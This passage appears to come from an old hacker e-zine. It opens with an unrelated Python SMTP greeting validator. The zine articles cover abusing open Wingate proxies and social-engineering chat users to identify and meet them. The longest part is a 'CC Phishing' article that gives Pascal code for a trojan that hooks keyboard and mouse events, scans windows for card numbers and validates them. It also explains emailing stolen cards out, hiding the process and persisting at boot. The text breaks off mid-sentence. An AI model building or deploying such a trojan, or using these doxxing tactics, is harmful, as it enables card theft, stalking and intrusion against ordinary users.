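        return 500, "line not terminated by CRLF"
    try:
        text = line[:-2].decode("ascii")
    except UnicodeDecodeError:
        return 500, "non-ASCII octets in command"
    verb, _, arg = text.partition(" ")
    if verb.upper() not in ("HELO", "EHLO"):
        return 500, "command not recognized"
    arg = arg.strip()
    if not arg:
        return 501, "missing domain"
    if len(arg) > MAX_DOMAIN:
        return 501, "domain too long"
    if not (DOMAIN_RE.match(arg) or LITERAL_RE.match(arg)):
        return 501, "not a domain or address literal"
    return 250, "ok"


def run_session(data):
    """Check every line of a captured client byte stream as a greeting."""
    stream, replies = io.BytesIO(data), []
    while True:
        line, total = read_command(stream)
        if not line:
            return replies
        replies.append(check_greeting(line, total))


# Constructed client input; each line is judged on its own as a greeting.
SAMPLE_SESSION = (
    b"HELO mail.example.org\r\n"
    + b"HELO " + b"z" * 5000 + b"\r\n"   # the padded greeting from the text
    + b"EHLO [192.0.2.7]\r\n"
    + b"HELO bad_host!\r\n"
    + b"HELO " + b"a" * 300 + b"\r\n"    # fits the line cap, not the domain cap
)

if __name__ == "__main__":
    for code, reason in run_session(SAMPLE_SESSION):
        print(code, reason)
```

 Because the length is checked on the raw octets before anything is copied
 or parsed, the padded line is answered with a 500 reply and the connecting
 address the server records is unaffected.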

      ========> Wingate (WinGateZ ;-)

 Wingate is a program that is used as a proxy on Winboze 9x/NT servers, so
 when you hear Wingate, think bug ;-))))))))

 Now I will explain, for those who still don't know, what Wingate means and
 what you eat it with ;-))) Because I know the others are laughing out loud
 right now: to them it smells of PhUN ;-)

 The big problem with Wingate is that anyone, absolutely anyone, can connect
 to it on port 1080. You can guess the rest.... anyone can connect to this
 little 'proxy' and type: target-ip-address-or-hostname port. Then Wingate
 will relay the request and it will look as if the machine Wingate is running
 on is making the request. Naturally, the sysadmin can change the port, but
 that is not a big problem, right? ;). A recommendation for everyone who is
 running Wingate right now ;-): people, at least install SyGate. The
 difference is that at least not everyone will be able to connect ;-)

 The beautiful thing is that wingate can be used for practically anything:
 anything you can give a SOCKS Firewall to. Mdammm, you can use it for
 example when you get banned from some IRC channel, because your IP will no
 longer match the ban. But don't overdo it :-))))

 Oh, and let me warn you: I have seen bots that randomly connect to
 yourIP:1080, i.e. that is how they check whether you are coming through a
 Gate Win (WinGate). And if it turns out they are in luck, they kick you !!!

 Here is a 'light' little list of WinGates:

   http://www.cyberarmy.com/lists/wingate/

 [Ed. note: here I will allow myself a comment: In reality wingate has plenty
 of options that let you filter out the creeps who try to sneak in on various
 ports. I, for example, have the N-th port open on my machine, which however
 is accessible only to Solar. The catch, though, is that older wingate
 versions let everyone in by default. Wingate for Win2K, for example, by
 default accepts connections only from the Ethernet interface]

      ========> IRC (or, more correctly, cIRC ;-)

 The easiest and the hardest place for anonymity ;-). You know that once you
 have entered IRC, anyone who knows your nick can find out the following
 things:

  1. Your real name (only through realname / a server that allows finger)
  2. Your e-mail (naturally, if you typed the real one).
  3. Your IP (unless you use one of the techniques mentioned above)
  4. Your hostname.
  5. Your ISP.
  6. Your continent.
  7. Your country.
  8. Your city.

  and, if you are careless, even more

 If you don't want it to turn out that way, just use Wingate, SOCKS, your
 neighbour's account or anything at all that comes to mind. And remember:
 IRC is the golden environment for soc. engineering, so be careful (so you
 don't go to the techno-link office and get thrown out of there ;-))) My
 recommendation is to use some fast socks and to watch who you talk to !!! ;)

      ========>  ICQ

 Let's leave aside the fact that you can give real info in the fields at
 registration (really, sometimes people think they are obliged to ;-). So
 with ICQ they can find out the same things about you as with IRC. But most
 often, when ICQ is mentioned, everyone thinks of IP, crack for IP and
 MultiICQ.

 The IP, or how to hide it, or how to find it out - Imagine what would happen
 if Mirabilis really let all messages pass through their server... they
 simply wouldn't hold up. That is why the messages are sent DCC ;-) Directly
 between the two hosts... and only if there are sometimes problems with
 sending is the 'thru server' option used, which is sometimes really very
 useful.

 How do we hide our own IP and thus avoid attack attempts? In 'security'
 there is an option 'IP Publishing' - it must be selected. There is also 'Web
 Aware' - this must not be checked, because anyone who wants to can find out
 whether you really are on ICQ at the moment.

 There is hardly anyone who doesn't know that the IP is hidden in your client
 when the ICQ on the other side is configured not to show its IP...
 consequently, if you can make your client ignore the notice that the client
 on the other side doesn't want its IP known, its IP will be visible. This is
 confirmed by the fact that in principle ICQ works on the DCC principle, i.e.
 the connection is made directly between the two ICQ clients. For this reason
 it is impossible for your client not to know the IP of the people you are
 talking to at the moment... it just doesn't want to tell :-))). The problem
 is solved with cracks (which are really terribly widespread everywhere), but
 if you can, make the little crack yourself; it will be much better, because
 who knows who wrote it, with which leg and what tampering he put in ;-)). If
 that is beyond you, there is another very simple way to find out the IP of
 the 'person' you are talking to.

 Only two things are needed:

 - To be actively talking with him at the moment (I mean messages, chat,
   file transfer..)
 - Netstat

 The first I don't think is a problem; the second, in case someone happens
 not to know it, shows you all active connections to your computer. Netstat
 exists in every Win 95/98/NT/2000 (not to mention Linux/Unix ;-), and if you
 can't manage (?!??!;) you can download some other netstat from somewhere -
 Xstat...etc. Most of them are GUIs for easier use.

 How it works: You run Netstat and see who has connected to which port, and
 naturally you see his IP. That's it. [Ed. note: the catch is that you have
 to hit the moment at which you send a msg, since ICQ waits for confirmation
 from the other side and after that closes the connection. You may also
 struggle a bit over which IP exactly to look at, because ICQ binds to
 several ports at once, and when it is run through SOCKS you will see nothing
 at all]

 (Note by Iron - That's not quite right... When a connection for sending a
 message is made, it stays open for quite a while (at least several minutes),
 in case you decide to send a message again. A kind of optimization :-) So
 netstat will show you everyone you have sent a message to (or who has sent
 you one) in the last few minutes)

 As you can see for yourselves, wherever you go, wherever you log in, your IP
 stays behind. Still, to some extent your IP doesn't say much about you,
 unless the account is your own. But let me warn you! BTK! Be careful,
 because if you get too cheeky, with a bit more interest (money, for example)
 BTK can play quite a nasty trick on you. I will give you an example.
 Personally, after I had collected half the accounts of one ISP, the boss of
 the ISP got a little 'interested' together with BeTeKa, and one day he
 showed up with a sheet printed personally by BeTeKa and showed me my
 telephone calls for the previous 3 days. (clarification: my phone line is
 analogue and the provider's modems did not have CallID!!!)

 If you start getting on the nerves of one particular provider, and if he has
 the 'good will', he can start carefully tracking the habits of his users. In
 my opinion that is a whole topic of its own. In case you haven't noticed,
 everyone has their habits: for example, right after getting onto the Inet he
 logs into ICQ, then goes to Hotmail to check his mail. In the meantime he
 opens the Phreedom mboard and so on. That can give you away. It may not give
 away exactly who you are. But after a little more interest that too can be
 found out. So you have to be very careful 'with whom' and 'how' ;-)

 [Ed. note: Phm#19 had quite an interesting article on the subject -
 Paranoia]

 A powerful weapon against your anonymity is soc. eng. After all, with 100
 grams of brain and a little imagination someone can worm such things about
 you out that you will regret it later. That is why you have to be careful in
 IRC, ICQ.... What other advice... mdam, I remembered a guy from Lovetch.
 After I read some things he had written, I unconsciously memorized elements
 by which he could be identified.

 You have to be very careful what you describe about yourself!!! Because he
 gave away things that should not be given away if you live in a small town.
 I will list some things that I remember:

    - Listens to Prodigy
    - Wears glasses
    - Lives in a two-storey house
    - Lives in Lovech
    - Knows people from the local BeTeKa
    - Is into computers
    - Has played pranks with the telephones of half of Lovetch
    - People from BTK stopped right at their house to check on account of
      these pranks
    ......

 Think about how many people in this 'big city', Lovetch, fit this
 description? If you live in Sofia or another big city, there are no problems
 with this info. BUT think about it: each one of these things says nothing by
 itself, but taken together? Anyway, I picked this example because it seems
 to me that the man was ready to squander a bit of his anonymity in order to
 win fame. Which is terrible!!!

 I won't paste you logs of IRC conversations, but after just one change of
 nick and one a/s/l - 18/f/Plovdiv I can find out quite a lot of useful
 information.

 And keep one more thing in mind: if someone sets his sights on learning info
 about you and you know each other only on ICQ, say, nothing stops him from
 doing a little checking on IRC under another nick... to find out at least
 which neighbourhood you live in. The next day he will pose as a completely
 different person, and once he knows the neighbourhood he can do something
 very clever.

   Example:
   <pi4ka>     - Hi
   <anonimen>  - hi.
   <pi4ka>     - how is it going ? ;-)
   <anonimen>  - ok...;-)
   ....blah blah...
   <pi4ka>     - I live in JK 'Margaritka' (for instance ;-)))
   <pi4ka>     - And where are you from ? ;-)
   <anonimen>  - heh ..I am from there too ;-)))
   (if you missed, it is simply that your grandma lives there and you visit
   her often ;)
   <pi4ka>     - wow...what a coincidence..what is your name
   (you make up a common name, for example Marija ;)
   <anonimen>  - Well, I can think of one .....
   (and from here on you improvise according to your own imagination)

 If you act cold-bloodedly, with measured emotions, you can find out even the
 guy's underpants. You can even arrange a meeting (just make sure you don't
 get stood up).

 But there is a way for that too. You bring some (female) phriend over to
 your place... and explain the situation to her. You get his phone number out
 of him, telling him you will call him right away. 'You want to hear him live
 ;-)'. You put your phriend on... she arranges the meeting and that's it.

 This is starting to look like a soc.eng. tutorial, but that is to show you
 what can happen, so that you understand that there are thousands of ways to
 find out your identity. So always bear in mind that the person sitting
 across from you may not be:

    - What he presents himself as
    - As good as you think he is

 Mdam, I will mention another thing that is very important: your friends!!!
 This concerns the people in your ICQ Contact list for example, the people
 from the channel... in general anyone who doesn't care about such anonymity
 (or simply doesn't know how to keep it). Sometimes the easiest way is to
 make friends with them, and then through them to reach the person you need.
 That is a much easier method. So warn your better friends, more precisely
 those who know a bit more about you.

 I personally have had such a 'Trojan horse' type attempt happen to me, but
 since I had warned the guy, he told me what had been planned.

 And something I intend to finish with:

 ...Anonymity is the most important thing on the Internet. After all, every
 person has the right to a private life (a private virtual world ;-p) that is
 not tracked, eavesdropped on or sniffed by anyone else.... In my opinion
 that is the biggest advantage, the most powerful weapon of the I'net. People
 have always unconsciously dreamed of this kind of communication: a little
 unreal, a little unconventional ;-). I will let you in on one more thing.
 When I saw a modem for the first time, I mean using a modem (not looking at
 it through the shop window), a friend and I connected with TERMINATE 5.00.
 And we started the chat. Well, we must have chatted for 6-7 hours then...
 Neither was he much of a talker, nor was I... Nor was it that we hadn't seen
 each other for years... It just takes hold of you...

 The I'Net is quite an interesting way of communicating. A way in which the
 '+'es far outnumber the '-'es. I won't even tell you what happened when I
 got my first 10 hours of Inet. (legally !!! ;-)

 There are quite a few organizations fighting for anonymity on the Inet. And
 so it should be. Maybe all of you have heard about the new (no longer so
 new) tricks of MiCRo$oFT and Intel (Intel Inside, Idiot outside - I don't
 agree with that - my CPU is a K6 ;-).

 This is about the identification numbers of the Intel processors of the
 Pentium III series. These are unique numbers that are written 'in hardware'
 into the CPU of every Pentium III. According to Intel this was going to help
 a lot against 'credit card fraud' (oh, ...damn ;-), against 'security
 problems', etc.

 But these identification numbers are pure 'numbering of the prisoners': any
 chance of anonymity goes to hell. Intel said that this number can be
 switched on and off only by the person sitting at the PC, and only at a low
 level, but right after those words little 'programs' popped up that
 manipulated exactly this UIN quite well. The situation is the same with
 MiCRo$oFT (even more tragic): when updating or registering Win, only
 MiCRo$oFT knows what info it pulls about the PC. Why else would they hide
 the source of that buggy Windows?. Imagine how much info it can pull about
 you ? :

   - Info about all installed programs.
   - Info on whether they are legally registered.
   - Passwords for everything you have saved.
   - .....thousands of other things...

 And recently there was a gaffe over a key that supposedly only MiCRo$oFT
 possessed. It turned out that not only does it possess it, but it has been
 'handing it out' left and right... but we all know what bastards the MS
 people are.

 (Note by Iron - The idea was that one key is held by Microsoft and the other
 by the NSA. Only that in Windows 2000, strangely, a third key has appeared
 too, and nobody says who has it)...

 The most important thing is that there are many Inet organizations that
 support anonymity on the Internet. They fight, one way or another, all
 attempts to violate this anonymity, no matter what giant is behind them. And
 every person who fights for freedom in one way or another is part of these
 organizations (even if indirectly). There are not many things a person wants
 to live for.

                        WE SHALL ARISE FOR PHREEDOM !

 I will give you a few links for your spare time ;-) :

   http://www.theargon.com
        (quite a good site for anonymity, PGP, Firewalls, Wingates... and
        others)
   http://www.pgpi.org
        (to learn a thing or two about PGP encryption)
   http://www.cyberarmy.com/lists
        (lots of Wingates, Proxies and also the best online toolz)

  CAT by: MiCRoPhoBIC                                  Written after chronic
  MiCRoPhoBIC.bg@usa.net                               lack of sleep.. ;-))

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#15ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  CC Phishing                                                  Star Gruhtar
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
 
  In the modern computerized world, electronic commerce conducted over the
 INTERNET has become very popular. The main payment method in on-line
 commerce is credit cards. Credit cards represent bank accounts belonging to
 people or companies, which are accessible through electronic payment
 systems. When payments are made over the INTERNET, the selling company
 usually requires not the card itself with which the customer will pay for
 the goods or service, but only the information that is written on it: name
 of the holder, type of card, card number, expiry date and in some cases the
 postal code from the holder's address. Because of technical impossibility,
 usually, when small sums are involved, nobody checks whether the INTERNET
 purchase is made by the holder of the card being used to pay or by someone
 else (a serious omission). Thus it is possible, if we have the data of
 someone else's credit card, to make payments over the INTERNET at the
 expense of someone else's account. This, of course, is illegal in some
 countries, but in some it still is not. The important thing is that with the
 INTERNET payment system organized this way, credit card fraud is a frequent
 occurrence.

 Since we can benefit from possessing information about other people's credit
 cards, it will be interesting to look at the ways in which we can obtain
 such information. For brevity, from here on we will replace the expression
 "credit card information" simply with "card". We can conditionally divide
 the ways of obtaining cards into two groups: electronic and non-electronic.
 By non-electronic means we can obtain other people's cards by collecting
 sales receipts or invoices from shops, by copying the information from a
 card that somehow falls into our hands (for example if we work in a suitable
 place), or we can get such information from a friend. More interesting and
 safer ways of acquiring cards are the electronic ones. They are divided
 mainly into the following methods:

 Hacking  -  pronikvane  v  survuri  na  banki, elektronni magazini ili drugi
 organizacii, koito poddurzhat plashtania s karti;

 Fake-shops  -  Suzdavane  na  falshif  magazin, kudeto izmamenite klienti si
 populvat  informaciata  za kartite, kato si misliat che kupuvat neshto i tia
 otiva pri nas;

 Sniffing  - hakvane na survuri i podslushvane na informaciata, koiato minava
 prez tiah chrez specialni podslushvashti programi - sniffer-i;

 Social-Engeneering  - zabluda na potrebiteli da izpratiat dobrovolno kartite
 si, obiknoveno bez da razberat, che sa bili izmameni;

 Trojan-Horsing  -  pronikvane  v  kompiutrite  na obiknoveni potrebiteli ili
 firmi  chrez  troianki  kone, sled koeto ot tiah se izvlicha informaciata za
 kartite  im,  v  momenta, v koito te samite gi izpolzvat; osledniat metod se
 okazva  edin  ot  nai-lesnite,  osobeno  za  horata  s  dobri  programistski
 sposobnosti.  Pri nego ne sa nuzhni nito hakerski sposobnosti, nito niakakvi
 genialni  programistski  umenia, a uspehut mu v sravnenie s drugite metodi e
 mnogo   goliam,  vupreki  che  se  postiga  sravnitelno  lesno.  Eto  zashto
 po-natatuk  shte  iziasnim v detaili imenno tozi metod - fishvaneto na karti
 chrez  troianki  kone.  Troianskite  kone  predstavliavat programi, koito se
 instalirat  na  kompiutura na zhertvata i se izpolzvat za da go manipulirat,
 za  da  izvlichat  ili unishtozhavat informacia ili prosto za da mu suzdavat
 problemi.  Za  razlika  ot  kompiuturnite  virusi,  troianskite  kone  ne se
 samorazprostraniavat.  Tiahnata  funkcia  e  da  proniknat  v  kompiutura na
 zhertvata  i da svurshat niakakva polezna rabota za tozi, koito gi izpolzva.
 Osven  tova  troianskite  kone  obiknoveno  dobre se skrivat v operacionnata
 sistema  (poniakoga da zhe stavat chast ot neia), za da ne budat zabeliazani
 i otstraneni. Te si vurshat rabotata napulno nezabeliazano ot potrebitelite.
 Ima  niakolko  nachina  edin troianski kon da izvleche kartata na zhertvata.
 Ediniat  e  da  pretursi  diskovite  ustroistva za failove s kreditni karti.
 Vtoriat  e  da  zapisva  vsichko,  koeto  potrebiteliat-zhertva  pechata  na
 klaviaturata, a tretiat e da prihvashta informaciata za kartite v momenta, v
 koito  tia se populva niakude. Osnovniat problem i pri trite nachina e da se
 izvleche  ot kupa nenuzhna informacia samo poleznata. Purviat nachin postiga
 mnogo  slabi  rezultati,  zashtoto  pochti  nikoi  ne si durzhi kartat a vuv
 failove  po diska. Pri vtoria nachin e mnogo trudno da se otsee poleznata ot
 nepoleznata  informacia  i  sushto e slabo rezultaten, zashtoto obiknovenite
 horata   pishat   stotici  neshta  vseki  den.  Tretiat  nachin  se  naricha
 "CC-fishing"  ili  "fishvane  na  kr  editni karti" i pokazva izkliuchitelno
 visoki  rezultati.  Toi  se  bazira  na ideiata za prihvashtane na kartite v
 momenta,  v  koito  potrebiteliat  gi  izpolzva,  po vreme na izvurshvane na
 elektronni  plashtania  po  INTERNET.  Predimstvata na pridobitite po tozi n
 achin  karti sa niakolko. Kartata, koiato pridobivame se izpolzva v INTERNET
 za  plashtania  i  zatova bankata shte razreshava i na vseki drug da plashta
 on-line  s  neia, t.e. kartata e validna i raboteshta. Chovekut, na kogoto e
 kartata  obiknoveno e mnogo da leko e nepoznat. Tova namaliava shansovete da
 si  imate  problemi  sled  zloupotrebata  s  neia.  Vse pak ako pazaruvate s
 kartata na suseda vi i toi razbere, niama da e mnogo veselo...

 Opisano  nai-nakratko  metodut za fishvane na karti se sustoi v slednoto: Na
 kompiutura  na zhertvata po niakakuv nachin se instalira troianski kon. Tozi
 kon sledi postoianno poletata na aktivnia prozorec i kogato v niakoe ot tiah
 zabelezhi   validen   nomer   na   kreditna  karta,  izprashta  po  e-mail-a
 informaciata  ot  celia aktiven prozorec na hakera (suzdatelia na troianskia
 kon). Taka se prihvashtat pochti vsichki on-line plashtania, koito izvurshva
 zhertvata,  nezavisimo  dali  go  pravi prez WEB-brauzur ili s drug softuer.
 Obiknoveno  cialata informacia za kartata se namira v tozi prozorec i ako ia
 prihvanem,  e  mnogo  veroiatno da sme se sdobili s tursenata informaciata -
 kartata  na  zhertvata.  Za  da  razberem  dali  v niakoe pole ot aktivnia v
 momenta  prozorec  ima  nomer  na  kreditna karta, mozhem da izpolzvame edna
 hitra  strategia  -  da  analizirame  vsichki poleta i da vidim dali dannite
 niakude  otgovariat  na  nomer  na  kreditna karta. Ako imame pole, koeto se
 sustoi  samo  ot  cifri,  intervali  i  tireta,  sled  kato mahnem tiretata,
 mozhem da proverim dali poleto sudurzha validen nomer. Tova stava purvo kato
 proverim  dali  dulzhinata  na chisloto e tolkova cifri, kolkoto triabva (za
 VISA  -  13  ili  16,  za  MasterCard - 16 i t.n.). Kato se ima predvid, che
 poslednata  cifra v nomera ta na kartite e specialna kontrolna suma, triabva
 da  izchislim  kontrolnata  suma  na  vsichki  cifri  bez poslednata i da ia
 sravnim  s neia. Algoritumut za tazi kontrolna suma e izvesten. Ako i broiat
 cifri  i kontrolnata suma suvpadnat, to e pochti sigurno, c he potrebiteliat
 e vuvel kreditna karta v WEB-brauzura ili niakoia druga programa, koiato toi
 izpolzva  za  plashtania. Dostatuchno e da zapishem celia aktiven prozorec v
 niakakuv fail ili puk samo vsichkite mu poleta ili chast ot tiah i sled tova
 si  da  izpratim  tozi  fail  po  e-mail-a  i  da  go iztriem. Razbira se, e
 zadulzhitelno  da go kodirame, makar i po niakakuv elementaren nachin, za da
 ni  hvashtat  po  trudno  i  za  da  ne  ni  kradat otkradnatite karti chrez
 podslushvane na tarfika po mrezhata.

 Da  poglednem  na  neshtata  ot programistska gledna tochka. Kak da napishem
 troianski  kon za fishvane na kreditni karti? Troianski kone, koito rabotiat
 po  opisania  mehanizum  mogat  da  se  napishat  za  proizvolna operacionna
 sistema,  no  nie  shte  nablegnem  na  WINDOWS  95/98/NT,  poradi  niakolko
 predimstva:  Tova  e nai-populiarnata operacionna sistema, razprostranena po
 milioni  kompiutri po sveta, koiato se izpolzva ot masovia potrebitel, koito
 pochti vinagi ne razbira mnogo ot kompiutri. Takiva potrebiteli, se narichat
 lammer-i i sa osnovnite zhertvi na CC-fishinga s troianski kone. Nashata cel
 e  da  napishem  troianski  kon,  koito  da  prihwashta  kreditnite karti ot
 programite,    raboteshto   pod   upravlenieto   na   WINDOWS.   Ezikut   za
 programirane,  koito  shte  izpolzvame  ne  e ot znachenie. Vse pak nie shte
 izpolzvame  Borland  Pascal  7.0.  V  tazi statia ne smiatame da publikuvame
 pulniat sors kod na troianski kon za karti, a samo da dadem osnovnite nasoki
 za razrabotka.

 Za   prihvashtaneto   na  sudurzhanieto  na  tekushtia  prozorec  mozhem  da
 izpolzvame  mnogo metodi. Edin ot tiah e prez opredelen interval ot vreme da
 skanirame  vsichki  poleta  na  aktivnia prozorec za validen nomer na karta.
 Po-efektiven  e obache drugiat podhod - da izvurshvame takova skanirane samo
 pri klikvane s mishkata ili pri natiskane na klavisha [Enter]. Tozi podhod e
 po-umen, zashtoto obiknoveno potrebiteliat natiska [Enter] kogato e populnil
 informaciata  si i e gotov da ia izprati. Postoiannoto skanirane bi moglo da
 zabavi sistemata. Pri nashia nachin takova skanirane shte se izvurshva mnogo
 po-riadko. Preporuchitelno e da se napishe efektiven kod za tursene na karti
 po  tekushtia  prozorec.  Prihvashtaneto  na  sistemnite subitia v WINDOWS -
 klikvane s mishka i natiskane na klavish mozhe da se izvurshi chrez sistemni
 funkcii za HOOK-vane na subitia po slednia nachin:

 SetWindowsHOOK(WH_KEYBOARD, MakeProcedureInstance(@MyKeyboardProc,hInstance));
 SetWindowsHOOK(WH_MOUSE, MakeProcedureInstance(@MyMouseProc,hInstance));

 kudeto  funkciite MyKeyboardProc i MyMouseProc sa definirani kakto e opisano
 v dokumentaciata. Te mogat da sa naprimer neshto podobno na:

 Function MyKeybHookProc(Code:integer; w:word; l:longint): longint;
  EXPORT;
 Begin
   MyKeybHookProc:= DefHookProc(Code,w,l,OldKeybHOOK);
   if (l and (1 shl 31) <> (1 shl 31)) then
     if w = vk_RETURN then
         EnumChildWindows(GetActiveWindow,@ProcessCurrentWindow,0);
 End;

 kudeto  funkciata  ProcessCurrentWindow  skanira  za validni nomera na karti
 zadadenia  i  kato  parametur  prozorec.  Edna  takava  procedura  mozhe  da
 izglezhda naprimer po slednia nachin:

 Function ProcessCurrentWindow(WND:HWnd;l:longint): boolean; export;
 Const Next = false;
       Prev = true;
 Var Field: HWnd;
     S: PChar;
     aText: string;

   Function GetFieldText: string;
   Begin
   if (Field=0) or
 (SendMessage(Field,WM_GETTEXT,255,longint(S))=0) then
       GetFieldText:=''
     else GetFieldText:=StrPas(S);
   End;

   Procedure NextField(NextPrev:boolean);
   Var F: HWnd;
   Begin
     F:=GetNextDlgTabItem(WND,Field,NextPrev);
     if F = Field then Field:=0 else Field:=F;
   End;

   Function FindCC: boolean;
   Var Counter: integer;
   Begin
     Field:=0; Counter:=0;
     repeat
       aText:=GetFieldText;
       if ValidCC(aText) then
         begin FindCC:=true; Exit; end;
       NextField(Next); Inc(Counter);
     until (Field = 0) or (Counter > 128);
     FindCC:=false;
   End;
 BEGIN
   ProcessCurrentWindow:=true;
   if FindCC then
     begin
        <<GetCC>>; {Vzema kartata - naprimer vsichki poleta ot prozoreca}
        <<WriteTheCCToFile>>; {Kodira informaciata i ia zapisva vuv fail}
                 <<TryToSendTheFileToYourEMail>>; {Puska mehanizma za izprashtaneto na
                          faila s kartata. Obiknoveno izprashtaneto stava ot glavnata programa }
     end;
 END;

 Posochenata  funkcia  suvsem  ne  pretendira  za  optimalnost ili krasota na
 realizaciata,  no  vse  pak  vurshi dobra rabota. Ne zabraviaite da slozhite
 tazi  funkcia  v  otdelen  .DLL fail, zashtoto ima opastnost sistemata vi za
 zavisne   ili   prosto   programata   da   ne  raboti.  Napravete  spravka s
 dokumentaciata. Obiknoveno procedurite, obrabotvashti HOOK-ove triabva da sa
 v  .DLL. Funkciata, koiato vrushta dali edin simvolen niz e validen nomer na
 karta e edna ot nai-vazhnite:

 Function ValidCC(const Card:string): boolean;
 Var CheckSum,i,digit,PozL,PozR: integer;
     CC: string;
     C: array[0..255] of byte absolute CC;
 Begin
   { --- Extract all digits from Card to CC --- }
   CC:=''; PozL:=1; PozR:=length(Card);
   for PozL:= 1 to length(Card) do
     if (Card[PozL]>='0') and (Card[PozL]<='9') then Break;
   for i:= PozL to length(Card) do
     if Card[i] in['-',' '] then
       Continue {Only ' ' and '-' can appear between digits}
     else if (Card[i]>='0') and (Card[i]<='9') then
            begin CC:= CC + Card[i]; PozR:=i; end
     else Break;
   { --- Check if extracted number can be CC --- }
   ValidCC:=false;
   if (PozL > 1) and (Card[PozL-1] <> ' ') then
     Exit; {The card must have ' ' or nothing else before
     its digits}
   if (PozR < length(Card)) and
    (not(Card[PozR+1] in [' ',',',#10,#13])) then
     Exit; {The card must have ' ', ',' or nothing else after its
 digits}
   if CC[1] = '3' then {AmericanExpress, DinnersClub - 14, 15 digit}
     if (C[0] <> 15) and (C[0] <> 14) then Exit;
   if CC[1] = '4' then {VISA - must be 13 or 16 digit}
     if (C[0] <> 13) and (C[0] <> 16) then Exit;
   if CC[1] = '5' then {MasterCard - must be 16 digit}
     if C[0] <> 16 then Exit;
   if CC[1] = '6' then {Discover Card - must be 16 digit}
     if C[0] <> 16 then Exit;
   if CC[1] in ['0','1','2','7','8','9'] then
     Exit; {No known credit card begins with such digit}
   { --- Calculate credit card check sum --- }
   CheckSum:= 0;
   for i:= 1 to C[0]-1 do
     begin
       digit:= C[i] - 48;
       if odd(i+C[0]) then digit:= digit shl 1;
       if digit >= 10 then Dec(digit,9);
       Inc(CheckSum,digit);
     end;
   CheckSum:= (10-(CheckSum mod 10)) mod 10;
   {Return if card is valid /last digit=checksum/}
   ValidCC:= (C[C[0]]-48 = CheckSum);
 End;

 Tazi  funkcia  e  mnogo  vazhna  i  sushtestvena.  Variantut,  v koito vi ia
 predlagame  e  pochti idealen, zashtoto e izpitan napraktika i pokazva mnogo
 dobri  rezultati. Predstavete si samo kakvo bi stanalo ako dopusnete greshka
 v  tazi  funkcia? Az naprimer proveriavah nepravilno kontrolnata suma v edna
 ot starite versii i si prepulnih poshtenskata kutia s vsiakakvi pisma, koito
 na   programata   i  prilichaha  na  karti  (a  na  mene  mi  prilichaha  na
 bezsmislici).

 Procedura  za  izprashtane  na  e-mail niama da vi davam. Povecheto sredi za
 razrabotka  pod WINDOWS si imat sobstveni sredstva za izprashtane na poshta.
 Ot  vsevuzmozhni  mesta  v  INTERNET  mozhete da izteglite sorsove na C i na
 DELPHI  ili puk mozhete da si napishete neshto sobstveno. Vse pak mozhete da
 si izteglite hubavi biblioteki za e-mail ot

     http://www.rtfm.be/fpiette.

 Troianskiat  kon triabva da sledi postoianno za karti i da gi ulavia. Kogato
 e  ulovil  karta,  triabva  da  sledi  za vruzka s INTERNET i kato se poiavi
 niakakva  takava  vruzka  da  izprati kartata po e-mail-a na kogoto triabva.
 Problemut  da  se  proveri dali ima vruzka s INTERNET e lesno reshim. Mozhem
 prosto  da  se  opitvame  prez 5 minuti da izprashtame pismoto i ako niamame
 vruzka  s  INTERNET,  to  funkciata za izprashtane na e-mail shte ni vrushta
 greshka,  koeto  oznachava,  che sled 5 minuti triabva otnovo da probvame da
 izpratim  pismoto,  dokato  nakraia ucelim podhodiashtia moment. Razbira se,
 ima   i   drugi  nachini  za  ustanoviavane  dali  ima  vruzka  s  INTERNET.
 Izprashtaneto  na  pismoto  s  kartata  mozhem  da  osushtestvim prez niakoi
 publichen  SMTP  server  ili  napravo  prez  SMTP  server-a,  na  koito ni e
 poshtenskata  kutia.  Mozhem  sushto  da vzemem SMTP server-a ot standartnia
 e-mail  klient na zhertvata (Eudora, Outlook Express i t.n.) i da izpolzvame
 nego.  Taka nashiat kon shte raboti dazhe i kogato zhertvata polzva INTERNET
 prez  PROXY  server  i  niama  direktna vruzka. Izborut na izprashtasht SMTP
 server e sushtestven moment.

 Skrivaneto  na  troianskia  kon  e  drugiat  problem,  koito  triabva  da se
 preodoliava.  Ako  koniat  vi  e .EXE fail, skrivaneto mu v pametta mozhe da
 stane s funkciata:

 RegisterServiceProcess(0,1);
 Procedure RegisterServiceProcess(Process:longint;State:longint);
           far; external 'KERNEL';

 Tazi  funkcia  skriva  tekushtia  proces  ot spisuka, koito se poiaviava pri
 natiskane  na  [Ctrl-Alt-Del]  (Task  List).  Vnimavaite  s  tazi funkcia! V
 WINDOWS  NT  tia  ne sushtestvuva. Zatova e dobre e da ia vikate dinamichno.
 Drug  metod  za  skrivane  na proces e danapishete celia kod na konia v edin
 .DLL  fail.  Sled  kato izvikate tozi .DLL i ot nego slozhite sistemen HOOK,
 tozi  .DLL  shte  ostane  rezidenten  i  niama  da  se mahne ot pametta sled
 spiraneto  na  .EXE  faila.  Taka  niama da imate rezidenten proces, no shte
 imate   aktiven   rezidenten   .DLL,   koito  shte  vurshi  cialata  rabota.
 Potrebiteliat  niama da mozhe da vidi che ima troianski kon. Tozi metod e za
 predpochitane.

 Ima  oshte  edin  seriozen  problem  otnasiasht  se  do skrivaneto na konia.
 Ponezhe  koniat triabva da e postoianno aktiven, e nai-dobre toi da se puska
 sus  zarezhdaneto  na  operacionnata sitema. Nai-lesniat nachin e da slozhim
 konia  v  sekciata  [windows]  na faila WIN.INI "run=trojan_horse.exe" i pri
 zarezhdane  na  Windows  nashiat  troianec  shte se puska avtomatichno.

 (Bel.Iron - Ima oshte edin mnogo hitur nachin, s koito se sbluskah
  naskoro... pravi se slednata shashma: v SYSTEM.INI, v sekciata boot, shell
  poleto se zamenia sus slednoto:

  shell=explorer.exe troianec.exe

  Windows startira i dvete exe-ta. I, koeto e po-interesnoto, vseki put,
  kogato potrebiteliat se opita da pusne Windows Explorer, shte se puska i
  kopie na troiancheto:-)

 Drug sushto lesen podhod e da dobavim stonost v registry-to. Naprimer mozhem
 da       dobavim      stoinostta      "trojan_horse.exe"      v      kliucha
 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run".  Efektut
